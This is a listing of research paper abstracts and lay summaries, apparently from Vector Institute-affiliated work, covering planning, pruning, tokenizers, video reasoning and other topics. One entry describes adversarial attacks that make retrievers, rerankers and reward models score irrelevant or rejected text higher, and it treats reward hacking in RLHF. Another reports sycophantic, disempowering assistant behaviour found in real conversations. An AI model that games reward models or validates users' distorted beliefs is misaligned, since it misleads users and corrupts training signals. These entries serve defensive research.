Evgenii Opryshko, Junwei Quan, Claas Voelcker, Yilun Du, Igor Gilitschenski (Vector Faculty Member)
Abstract
Offline goal-conditioned reinforcement learning (GCRL) often struggles with long-horizon tasks, where errors in value estimation accumulate and produce unreliable policies. It is typically assumed that effective long-term planning is infeasible without specialized training. In contrast, our work demonstrates that existing GCRL policies can complete long-horizon tasks when combined with a lightweight, training-free planning wrapper. We find that standard goal-conditioned value functions encode locally consistent geometric structure sufficient for planning. Our approach, Test-Time Graph Search (TTGS), constructs a graph over the offline dataset and employs an adaptive subgoal selection strategy. To address unreliable value estimates during shortest-path search, we propose a novel mechanism that softly penalizes long-distance transitions. Our method incurs negligible computational overhead and requires no additional supervision or parameter updates. On the OGBench benchmark, TTGS significantly boosts success rates across multiple base learners and tasks, with primary gains on challenging long-horizon locomotion tasks where some success rates are improved from near-zero to over 90%, often matching or outperforming methods that require complex auxiliary training. Code and videos can be found at https://ktolnos.github.io/ttgs.
Summary
Teaching an AI agent to perform a long sequence of actions is much harder than teaching it short ones: small mistakes accumulate, and the agent gets lost. Existing fixes add generative planners or extra neural networks, but they are heavy and require redoing the training pipeline. We asked whether an agent that already takes reliable short steps could handle long journeys without any retraining.
We built Test-Time Graph Search (TTGS), a lightweight tool that wraps around an already-trained agent. It treats observations from the training data as waypoints on a map and connects them using the agent’s own sense of how close two situations are. A shortest-path search picks a chain of nearby waypoints that guides the agent one short step at a time. Because the agent’s sense of distance is trustworthy for nearby places but noisy for far ones, we bias the search toward paths made of many small hops rather than a few long, uncertain ones.
On a standard benchmark, TTGS lifted success rates on the hardest navigation tasks from near zero to over 90%, while adding less than a second of computation. This lets practitioners unlock long-horizon performance from agents they have already trained, without extra data or training.
TLDR: Test-Time Graph Search (TTGS) demonstrates that value-derived distances from standard pretrained GCRL agents can guide subgoal planning across dataset states, improving performance without further training.
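The preference for "many small hops" can be illustrated with a small shortest-path sketch. This is not the TTGS implementation: the distance matrix here is hand-written rather than derived from a value function, and raising each edge length to a `power` greater than 1 is an assumed stand-in for the paper's soft penalty on long transitions.

```python
import heapq

def shortest_path(dist, start, goal, power=2.0):
    """Dijkstra over a dense graph whose edge cost is dist[i][j] ** power.

    With power > 1, one long hop costs more than several short hops that
    cover the same estimated distance, biasing the path toward short edges.
    NOTE: the power penalty is a hypothetical choice for illustration.
    """
    n = len(dist)
    best = [float("inf")] * n
    prev = [None] * n
    best[start] = 0.0
    heap = [(0.0, start)]
    while heap:
        cost, i = heapq.heappop(heap)
        if cost > best[i]:
            continue  # stale heap entry
        if i == goal:
            break
        for j in range(n):
            if j == i:
                continue
            new_cost = cost + dist[i][j] ** power
            if new_cost < best[j]:
                best[j] = new_cost
                prev[j] = i
                heapq.heappush(heap, (new_cost, j))
    # Walk predecessor links back from the goal to recover the waypoints.
    path = [goal]
    while path[-1] != start:
        path.append(prev[path[-1]])
    return path[::-1]

# Four states on a line at positions 0..3; "distance" is the position gap.
positions = [0, 1, 2, 3]
dist = [[abs(a - b) for b in positions] for a in positions]

path_penalized = shortest_path(dist, 0, 3, power=2.0)  # [0, 1, 2, 3]
path_plain = shortest_path(dist, 0, 3, power=1.0)      # [0, 3]
```

Without the penalty, the single long edge ties with the chain of short edges and the search keeps it; with the penalty, the search returns the chain of nearby waypoints, which is the regime where the distance estimates are described as most trustworthy.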
TextResNet: Decoupling and Routing Optimization Signals in Compound AI Systems via Deep Residual Tuning
Suizhi Huang, Mei Li, Han Yu, Xiaoxiao Li (Vector Faculty Member)
Abstract
Textual Gradient-style optimizers (TextGrad) enable gradient-like feedback propagation through compound AI systems. However, they do not work well for deep chains. This limitation stems from the *Semantic Entanglement* problem in these extended workflows. In standard textual backpropagation, feedback signals mix local critiques with upstream contexts, leading to *Attribution Ambiguity*. To address this challenge, we propose TextResNet, a framework that reformulates the optimization process to achieve precise signal routing via four key innovations. Firstly, in the forward pass, it enforces Additive Semantic Deltas to preserve an Identity Highway for gradient flow. Secondly, in the backward pass, it introduces Semantic Gradient Decomposition via a Semantic Projector to disentangle feedback into causally independent subspaces. Thirdly, it implements Causal Routing, which routes projected signals to their specific components. Finally, it performs Density-Aware Optimization Scheduling to leverage the disentangled signals to dynamically allocate resources to key system bottlenecks. Our results show that TextResNet not only achieves superior performance compared to TextGrad, but also exhibits remarkable stability for agentic tasks in compound AI systems where baselines collapse. Code is available at https://github.com/JeanDiable/TextResNet.
Summary
Modern artificial intelligence (AI) systems are increasingly built from multiple specialized AI agents working together in a chain—for example, one agent searches the web, another summarizes the text, and a third writes the final answer. However, automatically improving these multi-agent systems is highly challenging. When the final answer is incorrect, existing tools struggle to pinpoint which agent made the mistake, resulting in generic feedback that causes the wrong agents to attempt unnecessary fixes.
To address this, we developed TextResNet. Inspired by how computer networks manage traffic, TextResNet preserves the original information from each step and uses a helper AI to split error feedback into clean, distinct categories: mistakes caused locally versus those passed down from earlier steps. It then routes targeted feedback only to the agent responsible for the error, while a smart scheduling system focuses optimization efforts on the system’s biggest bottlenecks.
Our method makes cooperative AI systems significantly more stable and accurate. It also uses one-third of the computing resources, paving the way for more reliable, cost-efficient, and easily debuggable multi-agent AI applications.
TLDR: TextResNet fixes Semantic Entanglement via an Identity Highway and Semantic Projector. It ensures stable feedback routing and outperforms baselines in deep AI system optimization.
ToaSt: Token Channel Selection and Structured Pruning for Efficient ViT
Hyunchan Moon, Cheonjun Park, Steven Waslander (Vector Faculty Affiliate)
Abstract
Vision Transformers (ViTs) have achieved remarkable success across various vision tasks, yet their deployment is often hindered by prohibitive computational costs. While structured weight pruning and token compression have emerged as promising solutions, they suffer from prolonged retraining and inter-layer dependencies that complicate optimization, respectively. We propose ToaSt, a decoupled framework applying specialized strategies to distinct ViT components. We apply coupled head-wise structured pruning to Multi-Head Self-Attention modules, leveraging attention operation characteristics to enhance robustness. For Feed-Forward Networks (over 60% of FLOPs), we introduce Token Channel Selection (TCS), a training-free method that filters redundant noise channels at inference time. Extensive evaluations across nine diverse models, including DeiT, ViT-MAE, and Swin Transformer, demonstrate that ToaSt achieves superior trade-offs between accuracy and efficiency, consistently outperforming existing baselines. On ViT-MAE-Huge, ToaSt achieves 88.52% accuracy (+1.64%p) with 39.4% FLOPs reduction. ToaSt also transfers effectively to diverse downstream tasks (COCO detection, ADE20K segmentation, CIFAR-100 classification), achieving 52.2 versus 51.9 mAP on COCO. Code: https://github.com/SHANNonLab-HUFS/ToaSt
Summary
Modern AI systems that understand images — from medical scans to self-driving cars to photo search — have become remarkably powerful, but also remarkably expensive to run. They demand massive computation, making them slow and costly to deploy on everyday devices like phones, drones, and cameras.
We developed ToaSt, a method that makes these AI models smaller and faster while keeping their accuracy intact. Like trimming a tree by removing dead branches, ToaSt identifies parts of the model that contribute little to its decisions and removes them. Unlike most existing techniques, ToaSt requires no additional training, so it can be applied instantly to any pretrained model.
Tested across nine different image-recognition models, ToaSt reduced computation by up to 40 percent without losing accuracy — and in several cases, the slimmer models became slightly more accurate, because removing noisy components helped the model focus on what matters. The method also transferred smoothly to other tasks, including object detection and scene segmentation.
By cutting the cost of running AI vision systems, our work helps bring these technologies to more devices and more users, while reducing the energy footprint of increasingly large AI models.
TLDR: Structured Weight & Token Channel Pruning
TokSuite: Measuring the Impact of Tokenizer Choice on Language Model Behavior
Spotlight paper
Gül Sena Altıntaş, Malikeh Ehghaghi, Brian Lester, Fengyuan Liu, Wanru Zhao, Marco Ciccone (Vector Distinguished Postdoctoral Fellow), Colin Raffel (Vector Faculty Member)
Abstract
Tokenizers provide the fundamental basis through which text is represented and processed by language models (LMs). Despite the importance of tokenization, its role in LM performance and behavior is poorly understood due to the challenge of measuring the impact of tokenization in isolation. To address this need, we present TokSuite, a collection of models and a benchmark that supports research into tokenization’s influence on LMs. Specifically, we release fourteen pre-trained models that use different off-the-shelf tokenizers but are otherwise identical, using the same architecture, dataset, training budget, and initialization. We also release a multilingual robustness benchmark that measures model performance under real-world perturbations in English, Chinese, Farsi, Italian, and Turkish, curated by native annotators. Together, TokSuite allows robust decoupling of the influence of a model’s tokenizer, supporting a series of novel findings that elucidate the respective benefits and shortcomings of a wide range of popular tokenizers.
Summary
Before a language model reads any text, it first splits it into small pieces called “tokens” from a fixed, limited vocabulary. Unlike humans, who can encounter a new word and learn it as a word in its own right, language models can only work with units they already know. For example, the word “doctor” might be split into “doc” and “tor”. This process, called tokenization, is one of the earliest decisions made when building a language model, yet it is often treated as an afterthought, with many models simply borrowing whatever tokenizer a previous model used. We study how much this choice actually matters.
The challenge is that existing models differ in too many ways (their size, training data, architecture), making it hard to pin performance differences on the tokenizer alone. So we trained 14 models that are identical in every way except for their tokenizer, and paired them with a new benchmark of about 5,000 test cases covering real-world language variations across five languages, as well as mathematical notation and scientific content, all curated by native speakers.
We found that tokenizer design consistently shapes how robust a model is to everyday imperfections like typos, foreign scripts, or formatted equations, more so than model size or training duration. Even a tiny whitespace difference inside a math formula could cause a model to fail completely. We hope TokSuite helps the community make more informed tokenizer choices in the future.
TLDR: We train fourteen models identical except for tokenization and evaluate tokenization effects on a custom multilingual benchmark designed specifically for tokenization.
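The “doctor” example and the sensitivity to typos can be reproduced with a toy tokenizer. The sketch below uses greedy longest-match splitting over a tiny made-up vocabulary; it is an assumption for illustration and does not correspond to any of the tokenizers studied in TokSuite, which use their own learned vocabularies and algorithms.

```python
def greedy_tokenize(text, vocab):
    """Split text left to right, always taking the longest vocabulary match.

    Characters that match no vocabulary entry fall back to single-character
    tokens. NOTE: toy scheme for illustration, not a production tokenizer.
    """
    tokens, i = [], 0
    max_len = max(len(v) for v in vocab)
    while i < len(text):
        # Try the longest candidate first, shrinking until something matches.
        for size in range(min(max_len, len(text) - i), 0, -1):
            piece = text[i:i + size]
            if piece in vocab or size == 1:
                tokens.append(piece)
                i += size
                break
    return tokens

vocab = {"doc", "tor", "do", "c"}  # hypothetical vocabulary

tokens_clean = greedy_tokenize("doctor", vocab)  # ['doc', 'tor']
tokens_typo = greedy_tokenize("docotr", vocab)   # ['doc', 'o', 't', 'r']
```

A single transposed letter doubles the number of tokens and replaces a familiar piece with three single characters, which hints at why the same model can behave differently on clean and perturbed text depending on its tokenizer.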
Unifying Adversarial Robustness and Training Across Text Scoring Models
Manveer Tamber, Hosna Oyarhoseini, Jimmy Lin (Vector Faculty Affiliate)
Abstract
Research on adversarial robustness in language models is currently fragmented across applications and attacks, obscuring shared vulnerabilities. In this work, we propose unifying the study of adversarial robustness in text scoring models spanning dense retrievers, rerankers, and reward models. This motivates adapting both attacks and adversarial training methods across model roles. Unlike open-ended generation, text scoring failures are directly testable: an attack succeeds when an irrelevant or rejected text outscores a relevant or chosen one. Using this principled lens of text scoring, we demonstrate that current adversarial training formulations for language models are often short-sighted, failing to effectively generalize across attacks. To address this, we introduce multiple adversarial training methods for text scoring models and show that combining complementary training methods can yield strong robustness while also improving task effectiveness. We also highlight the practical value of our approach for RLHF, showing that our adversarially trained reward models mitigate reward hacking and support the training of better-aligned LLMs. We provide our code and models for further study.
Summary
Language models can be fooled by small changes to their inputs, but research on this problem is usually split across different applications and attack types, which hides common weaknesses. We bring these together by focusing on models that assign scores to text, including search models that rank results and reward models that judge LLM responses. In this setting, an attack is simple to define: irrelevant or bad text should not score higher than relevant or good text. We find that common defenses for training more robust models often fail to carry over across attacks, while combining different defensive training methods gives much broader protection without hurting downstream task accuracy, and sometimes even improving it. When used to train LLMs with reinforcement learning, our more robust reward models are also harder to game and lead to better-aligned LLMs.
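The success criterion described above is easy to state in code. The following sketch assumes a deliberately weak toy scorer (`overlap_score`, which counts query words in a text) and made-up examples; neither the scorer nor the data comes from the paper. It only illustrates how an attack counts as successful when the bad text outscores the good one.

```python
def overlap_score(query, text):
    """Toy scorer: number of text tokens that also appear in the query."""
    query_tokens = set(query.lower().split())
    return sum(tok in query_tokens for tok in text.lower().split())

def attack_success_rate(score, triples):
    """Fraction of (query, positive, negative) triples in which the
    negative text receives a strictly higher score than the positive."""
    wins = sum(score(q, neg) > score(q, pos) for q, pos, neg in triples)
    return wins / len(triples)

# Hypothetical examples: an unrelated negative, then the same negative
# with the query keywords stuffed in front of it.
triples = [
    ("capital of france", "Paris is the capital of France.",
     "Bananas are yellow."),
    ("capital of france", "Paris is the capital of France.",
     "capital of france capital of france bananas are yellow"),
]

rate = attack_success_rate(overlap_score, triples)  # 0.5
```

The same measurement applies whether the scorer is a retriever, a reranker, or a reward model, which is what makes the text scoring view convenient for comparing attacks and defenses across model roles.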
Variational Flow Maps: Make Some Noise for One-Step Conditional Generation
Abbas Mammadov, So Takao, Bohan Chen, Ricardo Baptista (Vector Faculty Affiliate), Morteza Mardani, Yee-Whye Teh, Julius Berner
Abstract
Flow maps enable high-quality image generation in a single forward pass. However, unlike iterative diffusion models, their lack of an explicit sampling trajectory impedes incorporating external constraints for conditional generation and solving inverse problems. We put forth _Variational Flow Maps_, a framework for conditional sampling that shifts the perspective of conditioning from “guiding a sampling path” to that of “learning the proper initial noise”. Specifically, given an observation, we seek to learn a _noise adapter model_ that outputs a noise distribution, so that after mapping to the data space via the flow map, the samples respect the observation and data prior. To this end, we develop a principled variational objective that jointly trains the noise adapter and the flow map, improving noise-data alignment, such that sampling from a complex data posterior is achieved with a simple adapter. Experiments on various inverse problems show that VFMs produce well-calibrated conditional samples in a single (or few) steps. For ImageNet, VFM attains competitive fidelity while accelerating the sampling by orders of magnitude compared to alternative iterative diffusion/flow models.
Summary
In contrast to iterative diffusion models, one/few-step generative models such as flow maps cannot naturally solve inverse problems (e.g., image deblurring and inpainting) because they lack a sampling trajectory that can be steered towards high-likelihood regions. To address this problem, we shift the perspective of conditioning from “guiding a sampling path” to “finding the initial noise” that leads to high-likelihood samples. This helps to solve a wide variety of inverse problems, as well as more general reward alignment problems, while retaining the blazing fast inference speed of one/few-step flow maps.
TLDR: We propose a method for one-step conditional generation by tilting the noise space.
A Very Big Video Reasoning Suite
Maijunxian Wang, Ruisi Wang, Juyi Lin, Ran Ji, Thaddäus Wiedemer, Qingying Gao, Dezhi Luo, Yaoyao Qian, Lianyu Huang, Zelong Hong, Jiahui Ge, Qianli Ma, Hang He, Yifan Zhou, Lingzi Guo, Lantao Mei, Jiachen Li, Hanwen Xing, Tianqi Zhao, Fengyuan Yu, Weihang Xiao, Yizheng Jiao, Jianheng Hou, Danyang Zhang, Pengcheng Xu, Boyang Zhong, Zehong Zhao, Gaoyun Fang, John Kitaoka, Xu Yile, Hua Xu, Kenton Blacutt, Tin Nguyen, Siyuan Song, Haoran Sun, Shaoyue Wen, Linyang He, Runming Wang, Yanzhi Wang, Mengyue Yang, Ziqiao Ma, Raphaël Millière, Freda Shi (Vector Faculty Member), Nuno Vasconcelos, Daniel Khashabi, Alan Yuille, Yilun Du, Ziming Liu, Dahua Lin, Ziwei Liu, Vikash Kumar, Yijiang Li, Lei Yang, Zhongang Cai, Hokin Deng
Abstract
Rapid progress in video models has largely focused on visual quality, leaving their reasoning capabilities underexplored. Video reasoning grounds intelligence in spatiotemporally consistent visual environments that go beyond what text can naturally capture, enabling intuitive reasoning over spatiotemporal structure, such as continuity, interaction, and causality. However, systematically studying video reasoning and its scaling behavior is hindered by the lack of large-scale video reasoning training data. To address this gap, we introduce the **Very Big Video Reasoning (VBVR) Dataset**, an unprecedentedly large-scale resource spanning *200* curated reasoning tasks following a principled taxonomy, and over *one million* video clips, making it approximately *three orders of magnitude* larger than existing datasets. We further present **VBVR-Bench**, a verifiable evaluation framework that moves beyond model-based judging by incorporating rule-based, human-aligned scorers, enabling reproducible and interpretable diagnosis of video reasoning capabilities. Leveraging the VBVR suite, we conduct one of the first video reasoning **scaling studies** and observe early signs of emergent generalization to unseen reasoning tasks. Together, VBVR lays a foundation for the next stage of research in generalizable video reasoning. The data, benchmark tool kit, and models are released publicly at **video-reason.com**.
Summary
Today’s AI can generate impressively realistic videos. But can it generate a video that actually *solves* a problem? Producing pixels that look real and producing pixels that follow the rules of physics, geometry, and logic are very different abilities, and AI has mostly mastered the first while still struggling with the second.
We study what we call **video reasoning**: using video itself as the medium for thinking. Just as a mathematician sketches a diagram to work through a problem, a video AI should be able to *generate* a video demonstrating a solution: the agent successfully navigating the maze, the objects correctly sorted, the ball obeying the laws of physics. Progress has been slow because researchers lack a large, organized collection of tasks whose answers a computer can verify objectively.
We built **VBVR (Very Big Video Reasoning)**: about one million short videos covering 200 reasoning tasks such as navigating mazes, sorting shapes, tracking objects through occlusion, predicting bounces, and fluid flows. Every task has a mathematically checkable correct outcome, so we can grade a model’s generated video automatically, without relying on subjective human or AI judgments.
Using this dataset, we trained one of the strongest video reasoning models built so far. As we scaled up the training data, the model began correctly handling reasoning tasks it had never seen during training. This is early evidence that, as data scale grows, video AI may gradually narrow the gap to the visual common sense humans take for granted. We release the dataset, the evaluation tools, and the trained models publicly.
TLDR: We introduce VBVR, a suite with the largest video reasoning dataset ever and a reproducible rule-based benchmark. Scaling experiments reveal early signs of emergent generalization.
When RAG Hurts: Diagnosing and Mitigating Attention Distraction in Retrieval-Augmented LVLMs
Beidi Zhao, Wenlong Deng, Xinting Liao (Vector Distinguished Postdoctoral Fellow), Yushu Li, Nazim Shaikh, Yao Nie, Xiaoxiao Li (Vector Faculty Member)
Abstract
While Retrieval-Augmented Generation (RAG) is one of the dominant paradigms for enhancing Large Vision-Language Models (LVLMs) on knowledge-based VQA tasks, recent work attributes RAG failures to insufficient attention towards the retrieved context, proposing to reduce the attention allocated to image tokens. In this work, we identify a distinct failure mode that previous studies overlooked: Attention Distraction (AD). When the retrieved context is sufficient (highly relevant or including the correct answer), the retrieved text suppresses the visual attention globally, and the attention on image tokens shifts away from question-relevant regions. This leads to failures on questions the model could originally answer correctly without the retrieved text. To mitigate this issue, we propose MAD-RAG, a training-free intervention that decouples visual grounding from context integration through a dual-question formulation, combined with attention mixing to preserve image-conditioned evidence. Extensive experiments on OK-VQA, E-VQA, and InfoSeek demonstrate that MAD-RAG consistently outperforms existing baselines across different model families, yielding absolute gains of up to 4.76%, 9.20%, and 6.18% over the vanilla RAG baseline. Notably, MAD-RAG rectifies up to 74.68% of failure cases with negligible computational overhead.
Summary
Retrieval-augmented large vision–language models (LVLMs) improve visual question answering by using external knowledge. However, even when the model can answer a question correctly from its parametric knowledge, adding high-quality oracle retrieved context can cause it to fail.
We identify a failure mode called attention distraction (AD), including (1) cross-modal AD: retrieved context suppresses attention allocated to image tokens, and (2) intra-image AD: visual attention shifts away from question-relevant visual regions to irrelevant regions. To address this, we propose MAD-RAG, a training-free method that separates visual grounding from knowledge integration and recovers the visual grounding ability of retrieval-augmented LVLMs.
Identifying AD and applying MAD-RAG lead to more accurate and reliable answers across knowledge-based VQA benchmarks, with minimal additional computational cost, making the approach practical for real-world multimodal systems.
TLDR: We propose MAD-RAG, a method to reduce Attention Distraction in retrieval-augmented LVLMs.
Who’s in Charge? Disempowerment Patterns in Real-World LLM Usage
Mrinank Sharma, Miles McCain, Raymond Douglas, David Duvenaud (Vector Faculty Member)
Abstract
We present the first large-scale empirical analysis of disempowerment patterns in real-world AI assistant interactions, analyzing 1.5 million consumer Claude.ai conversations using a privacy-preserving approach. We focus on situational disempowerment potential, which occurs when AI assistant interactions risk leading users to form distorted perceptions of reality, make inauthentic value judgments, or act in ways misaligned with their values. Quantitatively, we find that severe forms of disempowerment potential occur in fewer than one in a thousand conversations, though rates are substantially higher in personal domains like relationships and lifestyle. Qualitatively, we uncover several concerning patterns, such as validation of persecution narratives and grandiose identities with emphatic sycophantic language, definitive moral judgments about third parties, and complete scripting of value-laden personal communications that users appear to implement verbatim. Analysis of historical trends reveals an increase in the prevalence of disempowerment potential over time. We also find that interactions with greater disempowerment potential receive higher user approval ratings, possibly suggesting a tension between short-term user preferences and long-term human empowerment.
Summary
We present the first broad-scale empirical investigation into how AI assistants affect user autonomy, examining 1.5 million Claude.ai conversations using privacy-protective methods. We find that while severe disempowerment risks appear in under 0.1% of conversations overall, rates spike considerably in personal domains such as relationships and lifestyle choices. Concerning patterns include AI systems reinforcing conspiracy theories, delivering absolute moral pronouncements, and composing relationship communications that users send verbatim. We also find that disempowerment potential has increased over time, and that conversations exhibiting greater disempowerment potential received higher user satisfaction ratings, revealing an important tension between user preferences and long-term human flourishing.
TLDR: We looked at anonymized LLM usage to characterize when people give away their agency without meaning to.
Whom to Query for What: Adaptive Group Elicitation via Multi-Turn LLM Interactions
Ruomeng Ding, Tianwei Gao, Tom Zollo, Eitan Bachmat, Richard Zemel (Vector Faculty Member), Xinyu Yang
Abstract
Eliciting information to reduce uncertainty about latent group-level properties is a central problem in collective assessment, preference modeling, and opinion aggregation, and is especially important in survey-based studies. While natural language interactions provide a flexible interface, existing methods typically rely on fixed questionnaires and static respondent sets, and do not adapt to partial or missing responses across rounds. To address this gap, we study adaptive information elicitation through multi-turn interactions between a large language model and a group of individuals, where both queries and respondents are adaptively selected to infer latent group properties. We propose a theoretically grounded framework that, at each round, jointly selects a query and a subset of respondents based on previously observed responses to efficiently reduce uncertainty about a target latent quantity (e.g., group-level political inclination). Motivated by practical survey constraints, such as limited questions and costly participation, our strategy maximizes information gain under a fixed budget. To handle missing and incomplete responses, we combine graph neural networks for aggregating/imputing partial group information with an information-theoretic criterion that guides per-round selection. Across three real-world opinion datasets, we achieve consistent improvements in population-level response prediction under constrained budgets, including over a 12% relative gain on CES at a 10% respondent budget.
Summary
Understanding what a group of people thinks about politics, policy, or social issues usually means asking everyone the same fixed set of questions. But this is slow, expensive, and ignores the fact that some questions and some respondents are far more informative than others. What if we could run smarter surveys that learn as they go, asking the right questions to the right people at each step?
We developed an AI-driven framework that conducts surveys as an adaptive conversation. At each round, the system selects both which question to ask and which individuals to ask it to, based on what it has already learned, much like a detective who focuses follow-up questions where the answers are most revealing. When some people do not respond, the system fills in the gaps using a network-based model that draws on the responses of similar individuals. We tested our approach on three real-world public opinion datasets and found it consistently outperforms standard survey methods under tight budgets, achieving over 12% better accuracy in predicting group opinions while surveying only 10% of respondents.
This work could make opinion polling, market research, and policy surveys faster, cheaper, and more accurate, helping organizations better understand the communities they serve with fewer resources.
TLDR: We propose a population-aware adaptive elicitation framework that jointly selects questions and respondents to improve group-level prediction under limited survey budgets.
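The information-theoretic idea behind picking “the right question” can be shown in a few lines. This sketch is a simplification under stated assumptions: a single latent group property with a known prior, yes/no questions with known answer probabilities, and made-up numbers. The framework described above additionally selects respondents and uses graph neural networks to handle missing answers, none of which is modeled here.

```python
import math

def entropy(p):
    """Shannon entropy in bits of a discrete distribution."""
    return -sum(x * math.log2(x) for x in p if x > 0)

def expected_information_gain(prior, likelihood_yes):
    """Mutual information between the latent state and a yes/no answer.

    prior[k]          = P(state = k)
    likelihood_yes[k] = P(answer = yes | state = k)
    """
    p_yes = sum(p * l for p, l in zip(prior, likelihood_yes))
    likelihood_no = [1 - l for l in likelihood_yes]
    gain = entropy(prior)
    # Subtract the expected posterior entropy over both possible answers.
    for p_ans, lik in ((p_yes, likelihood_yes), (1 - p_yes, likelihood_no)):
        if p_ans > 0:
            posterior = [p * l / p_ans for p, l in zip(prior, lik)]
            gain -= p_ans * entropy(posterior)
    return gain

# Hypothetical two-state latent property and two candidate questions.
prior = [0.5, 0.5]
questions = {"informative": [0.9, 0.1], "uninformative": [0.5, 0.5]}

best = max(questions,
           key=lambda q: expected_information_gain(prior, questions[q]))
# best == "informative"
```

A question whose answer is equally likely under every state of the latent property yields zero gain, so under a fixed budget it is never worth asking.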